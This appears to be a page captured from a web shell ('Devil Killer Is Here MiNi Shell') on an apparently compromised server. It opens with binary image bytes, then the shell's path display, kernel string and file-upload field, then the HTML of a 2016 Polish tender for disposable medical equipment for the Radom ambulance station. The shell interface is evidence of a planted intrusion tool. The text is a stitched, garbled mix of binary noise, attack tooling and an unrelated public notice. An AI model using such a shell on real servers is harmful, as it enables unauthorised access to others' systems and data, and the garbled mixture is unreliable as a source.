JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160113/4019-N-2016.html

<p class="kh_header"><b>Radom: dostawa  sprzętu medycznego jednorazowego użytku
dla Radomskiej Stacji Pogotowia Ratunkowego</b><br>
<b>Numer ogłoszenia: 4019 - 2016; data zamieszczenia: 13.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomska Stacja Pogotowia Ratunkowego , ul. Tochtermana 1, 26-600 Radom, woj. mazowieckie, tel. 048 3626389, faks 048 3624847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa  sprzętu medycznego jednorazowego użytku
dla Radomskiej Stacji Pogotowia Ratunkowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest :   dostawa sprzętu medycznego jednorazowego użytku dla Radomskiej Stacji Pogotowia Ratunkowego  110 poz w następujących ilościach i rodzajach wyszczególnionych w poniższej : PRZEDMIOT ZAMÓWIENIA- Zamawiana ilość
 na okres 24 m-cy

1	Strzykawka dwuczęściowa 20ml Luer  op. 80szt.	188	op.
2	Strzykawka dwuczęściowa 10ml Luer  op. 100szt. 	150	op.
3	Strzykawka dwuczęściowa 5ml Luer op.100szt.	400	op.
4	Strzykawka dwuczęściowa 2ml Luer op.100szt.	600	op.
5	Strzykawki trzyczęściowa 100ml z końcówką do cewników, wyposażona dodatkowo w stożkowy łącznik Luer  opakowanie jednostkowe typu blister-pack	30	szt.
6	Strzykawki trzyczęściowe do pompy infuzyjnej 50ml luer-lock z rozszerzoną skalą do 60ml, opakowanie jednostkowe typu blister-pack        	50	szt.
7	Igła Motylek 0,5 pomarańczowy	4 000	szt.
8	Igła Motylek 0,6 niebieski                           	2 500	szt.
9	Igła Motylek 0,7 czarny                                 	1 500	szt.
10	Igła Motylek 0,8 zielony                	300	szt.
11	Igła jedn. użytku 0,5x25 mm a 100 szt	200	op.
12	Igła jedn. użytku 0,6x30 mm a 100 szt	120	op.
13	Igła jedn. użytku 0,7x30 mm a 100 szt	250	op.
14	Igła jedn. użytku 0,8x40 mm a 100 szt	500	op.
15	Igła jedn. użytku 0,9x40 mm a 100 szt	100	op.
16	Igła jedn. użytku 1,1x40 mm a 100 szt	120	op.
17	Igła jedn. użytku 1,2x40 mm a 100 szt	250	op.
18	Cewnik Foley CH 16 obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu 5-15ml, jałowy. Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o max czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie. Op. a 10 szt.	25	op.
19	Cewnik Foley CH 18, obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu 5-15ml jałowy. Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o max czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie. Op. a 10 szt. 	45	op.
20	Cewnik Foley CH 20, obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu 30-45ml, jałowy.Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o max czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie Op. a 10 sztuk.	30	op.
21	Cewnik Foley CH 22, obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu 30-45ml, jałowy.Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o max czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie. 
Op. a 10 sztuk.	20	op.
22	Szyny KRAMERA 1000 x 70	30	szt.
23	Szyny KRAMERA 1000 x 100	40	szt.
24	Szyny KRAMERA 1500 x 100	30	szt.
25	Szyny KRAMERA 1500 x 70	20	szt.
26	Szyny KRAMERA 600 x 50	30	szt.
27	Zatyczki do cewników Foleya - konstrukcja schodkowa- jałowe	400	szt.
28	Worek do zbiórki moczu 2 L sterylny	400	szt.
29	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 26G 0,6x19mm, przepływ 10ml min.	300	szt.
30	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi ze skrzydełkami rozmiar 22G 0,8x25mm, przepływ 31ml min.	7 500	szt.
31	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 20G 1,0x32mm, przepływ 54ml min	12 000	szt.
32	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 18G 1,2x32mm, przepływ 80ml min	7 000	szt.
33	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 17G 1,4x45mm, przepływ 125ml min	400	szt.
34	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 16G 1,7x45mm, przepływ 180ml min	500	szt.
35	Przedłużacz tlenowy ok.2,1m	500	szt.
36	Przyrząd do przetaczania  płynow  infuzyjnych  jałowy EO w skład aparatu  wchodzi: osłonka  igły biorczej,  igła  biorcza dwukanałowa,  komora  kroplowa  20 kropli = 1ml+ - 0,1 ml komora  kroplowa  wolna od PCV,  filtr płynu o wielkości  oczek 15um,  zaciskacz  rolkowy,  dren  dł. 150  cm, łącznik  stożkowy luer-lock,  osłonka łącznika luer-lock,  opakowanie  jednostkowe typu blister-pack,  przyrząd wolny  od ftalanów. lnformacja  o braku  ftalanow  na opakowaniu  jednostkowym.	7 000	szt.
37	Elektrody piankowe pediatryczne, piankowe z formułą hydrożelu stałego o wymiarach 30x24mm   	1 500	szt.
38	Elektrody piankowe z formułą hydrożelu stałego, owalne o wymiarach 57x34mm	70 000	szt.
39	Filtr oddechowy pediatryczny, elektrostatyczny, wirusowo-bakteriobójczy, sterylny z portem do  kapnografii zamykanym zatyczką, waga 9 g, przestrzeń martwa 10 ml	100	szt.
40	Filtr oddechowy elektrostatyczny, wirusowo - bakteriobójczy, sterylny z portem do kapnografii zamykanym zatyczką, waga 28,5 g, przestrzeń martwa 45ml	800	szt.
42	Samoprzylepny opatrunek do mocowania kaniul, jałowy 8 cm x 6 cm	21 000	szt.
43	Rękawice chirurgiczne lateksowe sterylne, pudrowane, z rolowanym mankietem, mikroteksturowane na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,19mm, dłoni 0,15mm, mankiecie 0,14mm, długość min. 250mm. Zgodne z normą EN 374, ASTM 1671 potwierdzone badaniami z jednostki niezależnej. Pakowane podwójnie  wew. papier - zew. papier folia  - nie składane na pół. Rozmiary 7,0	600	par
44	Rękawice chirurgiczne lateksowe sterylne, pudrowane, z rolowanym mankietem, mikroteksturowane na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,19mm, dłoni 0,15mm, mankiecie 0,14mm, długość min. 250mm. Zgodne z normą EN 374, ASTM 1671 potwierdzone badaniami z jednostki niezależnej. Pakowane podwójnie wew. papier - zew. papier folia - nie składane na pół. Rozmiary 7,5	600	par
45	Rękawice chirurgiczne lateksowe sterylne, pudrowane, z rolowanym mankietem, mikroteksturowane na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,19mm, dłoni 0,15mm, mankiecie 0,14mm, długość min. 250mm. Zgodne z normą EN 374, ASTM 1671 potwierdzone badaniami z jednostki niezależnej. Pakowane podwójnie wew. papier - zew. papier folia - nie składane na pół. Rozmiary 8,0	500	par
46	Rękawice chirurgiczne lateksowe sterylne, pudrowane, z rolowanym mankietem, mikroteksturowane na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,19mm, dłoni 0,15mm, mankiecie 0,14mm, długość min. 250mm. Zgodne z normą EN 374, ASTM 1671 potwierdzone badaniami z jednostki niezależnej. Pakowane podwójnie wew. papier - zew. papier folia - nie składane na pół. Rozmiary 8,5	300	par
47	Szpatułka drewniana laryng, niejałowa  op. x100 szt.	500	op.
48	Cewnik do podawania. tlenu przez nos dla dorosłych dł. ok. 200 cm       	5 000	szt.
49	Podkład dwie warstwy bibuły i warstwa folii, różne kolory; szerokość 51 cm perforacja co 80 cm, 25sztuk na rolce	2 000	szt.
50	Podkład dwie warstwy bibuły i warstwa folii, różne kolory; szerokość 51 cm perforacja co 80 cm, 50 sztuk na rolce	600	szt.
51	Maski flizelinowe jednorazowe      	1 000	szt.
52	Fartuchy flizelinowe jednorazowe                 	300	szt.
53	Pościel jednorazowa  poszwa + poszewka	1 500	szt.
54	Pojemniki na odpady medyczne z tworzywa sztucznego 1 I z otworem wrzutowym, kolor czerwony        	300	szt.
55	Pojemniki na odpady medyczne 0,7 l o owalnej podstawie, wykonane z PP, z otworem o średnicy max. 40 mm   po usunięciu zabezpieczeń otworu wrzutowego, kolor żółty i czerwony	1 500	szt.
56	Maski tlenowa dla dzieci z rezerwuarem sterylne	350	szt.
57	Maski tlenowa dla dorosłych z rezerwuarem sterylne	1 500	szt.
58	Maski tlenowa dla dorosłych z drenem sterylne	1 500	szt.
59	Maski tlenowa dla dzieci z drenem sterylne	500	szt.
60	Rurki ustno-gardłowe nr 1,2,3 Guedela sterylne  	360	szt.
61	Maska tlenowa z nebulizatorem i drenem dla dzieci sterylne	300	szt.
62	Rurki intubacyjne z mankietem niskociśnieniowym nr 9              	50	szt.
63	Rurki intubacyjne z mankietem niskociśnieniowym nr 9,5         	50	szt.
64	Rurki intubacyjne z mankietem niskociśnieniowym nr 10       	35	szt.
65	Rurki intubacyjne z mankietem niskociśnieniowym nr 8,5     	150	szt.
66	Rurki intubacyjne z mankietem niskociśnieniowym nr 8      	300	szt.
67	Rurki intubacyjne z mankietem niskociśnieniowym nr 7,5    	300	szt.
68	Rurki intubacyjne z mankietem niskociśnieniowym nr 7                         	200	szt.
69	Rurki intubacyjne z mankietem niskociśnieniowym nr 6,5      	100	szt.
70	Rurki intubacyjne z mankietem niskociśnieniowym nr 6        	60	szt.
71	Rurki intubacyjne bez mankietu nr 5,5                                    	60	szt.
72	Rurki intubacyjne bez mankietu nr 5                                        	50	szt.
73	Rurki intubacyjne bez mankietu nr 4,5                                      	50	szt.
74	Rurki intubacyjne bez mankietu nr 4	50	szt.
75	Rurki intubacyjne bez mankietu nr 3,5	60	szt.
76	Rurki intubacyjne bez mankietu nr 3	50	szt.
77	Rurki intubacyjne bez mankietu nr 2,5	50	szt.
78	Rurki intubacyjne bez mankietu nr 2                                 	60	szt.
79	Dotchawiczna rurka z drugim światłem nr 2,0	5	szt.
80	Dotchawiczna rurka z drugim światłem nr 2,5	5	szt.
81	Dotchawiczna rurka z drugim światłem nr 3,0	5	szt.
82	Maska tlenowa dla noworodków z drenem sterylna	50	szt.
83	Cewniki do odsysania górnych dróg oddechowych nr 6- 40cm                          	50	szt.
84	Cewniki do odsysania górnych dróg oddechowych nr 8 -40cm   	100	szt.
85	Cewniki do odsysania górnych dróg oddechowych nr 10-40cm     	150	szt.
86	Cewniki do odsysania górnych dróg oddechowych nr 12-60cm      	150	szt.
87	Cewniki do odsysania górnych dróg oddechowych nr 14-60cm      	200	szt.
88	Cewniki do odsysania górnych dróg oddechowych nr 16-60cm     	200	szt.
89	Cewniki do odsysania górnych dróg oddechowych nr 18-60cm  	250	szt.
90	Zgłębnik żołądkowy nr 6 dł. 800 - 1250mm     	20	szt.
91	Zgłębnik żołądkowy nr 8 dł. 800 - 1250mm     	20	szt.
92	Wskaźnik paskowy na parę wodną 5,3 min./134oC; 15min./121oC a100 szt.	20	op.
93	Kubeczki jednorazowego użytku 200ml a100 szt.	30	op.
94	Żel do elektrokardiografii 250g	35	szt.
95	Maska tlenowa z nebulizatorem dla dorosłych sterylna	300	szt.
96	Prowadnica do rurek intubacyjnych 6 FR sterylne	50	szt.
97	Prowadnica do rurek intubacyjnych 10 FR sterylne	50	szt.
98	Prowadnica do rurek intubacyjnych 14 FR, sterylne	50	szt.
99	Cewnik do karmienia, Ch 6, Ch 8, sterylne	30	szt.
97	Przedłużacz do pomp inf. 150cm, sterylne	100	szt.
98	Kranik trójdrożny, sterylny 	60	szt.
99	Zgłębnik żołądkowy Nr 18 dł. 1250mm sterylny     	30	szt.
100	Zgłębnik żołądkowy Nr 16 dł. 1250mm sterylny  	30	szt. 
101	Folia izotermiczna koc ratunkowy o rozmiarze 1,6x2,4 m	350	szt.
102	Rękaw papierowo-foliowy 7,5 cm x 200 mb  1 rolka	10	szt.
103	Rękaw papierowo-foliowy 12 cm x 200 mb 1 rolka	10	szt.
104	Rękaw papierowo-foliowy 20 cm x 200 mb 1 rolka	15	szt.
105	Rękaw papierowo-foliowy 25 cm x 200 mb 1 rolka	15	szt.
106	Końcówki jednorazowe do termometrów a 20 szt.	700	op.
107	Skalpele jednorazowe 10, ostre, wykonane ze stali nierdzewnej, posiadające rozmiar oraz nazwę lub inicjały producenta wygrawerowane na ostrzu, pakowane indywidualnie, op. a 10szt. Wyprodukowane w UE.	10	op.
108	Rękawice diagnostyczne do procedur o podwyższonym ryzyku, lateksowe, bezpudrowe, chlorowane. Grubość pojedynczej ściańki na palcu 0,40mm, dłoni 0,30mm, mankiecie 0,20mm, długość 295-300mm, rozciągliwość przed starzeniem 900%, siła zrywająca przed starzeniem 33N. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Opakowanie a 25 par, rozmiary S-XL.	20	op.
109	Rękawice diagnostyczne nitrylowe o obniżonej grubości. Grubość pojedynczej ścianki na palcu 0,08mm +/-0,01, dłoni 0,07 mm + -0,01, mankiecie 0,06mm + -0,01. Rolowany mankiet, teksturowane tylko na palcach, kolor niebieski lub biały, polimerowane od strony roboczej, chlorowane od wewnątrz, długość min. 240mm. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Przebadane na przenikalność min. 10 substancji chemicznych na conajmniej 2 poziomie ochrony potwierdzone badaniami z jednostki niezależnej od producenta. Informacja o substancjach oraz poziomie ochrony nadrukowana na opakowaniu. Informacja o barierowości dla min. 2 alkoholi stosowanych w dezynfekcji na co najmniej poziomie 1  fabryczne oznakowanie na opakowaniu lub dołączone badania. Dopuszczone do kontaktu z żywnością potwierdzone piktogramami na opakowaniu. Zgodne z normą ASTM F1671 potwierdzone badaniami z jednostki niezależnej. Pozbawione tiuramów oraz MBT potwierdzone badaniami HPLC z jednostki niezależnej. Rozmiar kodowany kolorystycznie na opakowaniu.  Opakowanie S,M,L a 250 sztuk. Rozmiar opakowania 12cm x 13cm x 15,5cm  + - 5% , pasujące do uchwytów naściennych pojedynczych lub potrójnych  z możliwością pojedynczego wyjmowania rękawic od spodu opakowania - mankiet zawsze wyjmowany pierwszy.	700	op.
110	Rękawice diagnostyczne nitrylowe o obniżonej grubości. Grubość pojedynczej ścianki na palcu 0,08mm + -0,01, dłoni 0,07mm + -0,01, mankiecie 0,06mm + -0,01. Rolowany mankiet, teksturowane tylko na palcach, kolor niebieski, polimerowane od strony roboczej, chlorowane od wewnątrz, długość min. 240mm. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Przebadane na przenikalność min. 10 substancji chemicznych na conajmniej 2 poziomie ochrony potwierdzone badaniami z jednostki niezależnej od producenta. Informacja o substancjach oraz poziomie ochrony nadrukowana na opakowaniu. Informacja o barierowości dla min. 2 alkoholi stosowanych w dezynfekcji na co najmniej poziomie 1  fabryczne oznakowanie na opakowaniu lub dołączone badania. Dopuszczone do kontaktu z żywnością potwierdzone piktogramami na opakowaniu. Zgodne z normą ASTM F1671 potwierdzone badaniami z jednostki niezależnej. Pozbawione tiuramów oraz MBT potwierdzone badaniami HPLC z jednostki niezależnej. Rozmiar kodowany kolorystycznie na opakowaniu. Opakowanie a 200 sztuk S-M-L	3 000	op.


Kody Wspólnego Słownika Zamówień
Kod CPV: 33141000-0  jednorazowe, nie chemiczne artykuły medyczne i hematologiczne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości: 3 500,00 zł 

 (słownie ; TRZY TYSIĄCE PIĘĆSET ZŁOTYCH)
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego:    ING Bank Śląski S.A. 26 1050 1793 1000 0090 3045 8005</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki 
      określone w art.22 ust.1 ustawy dotyczące: 
a)	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1-4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Posiadania wiedzy i doświadczenia:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1pkt.1-4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie  
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o 
      spełnianiu warunków udziału w postępowaniu art.22 ust.1 pkt.1-4, załącznik nr 2 do  
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Dysponowania odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie  
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o 
spełnianiu warunków udziału w postępowaniu art.22 ust.1 pkt.1-4, załącznik nr 2 do  
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Sytuacji ekonomicznej i finansowej:
      Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane oświadczenie o 
      spełnianiu warunków udziału w postępowaniu art.22 ust.1pkt.1-4, załącznik nr 2 do 
      SIWZ. 
Zamawiający dokona oceny spełnienia wyżej opisanych warunków na podstawie 
     oświadczeń i dokumentów złożonych przez Wykonawcę na zasadzie spełnia lub  nie 
     spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

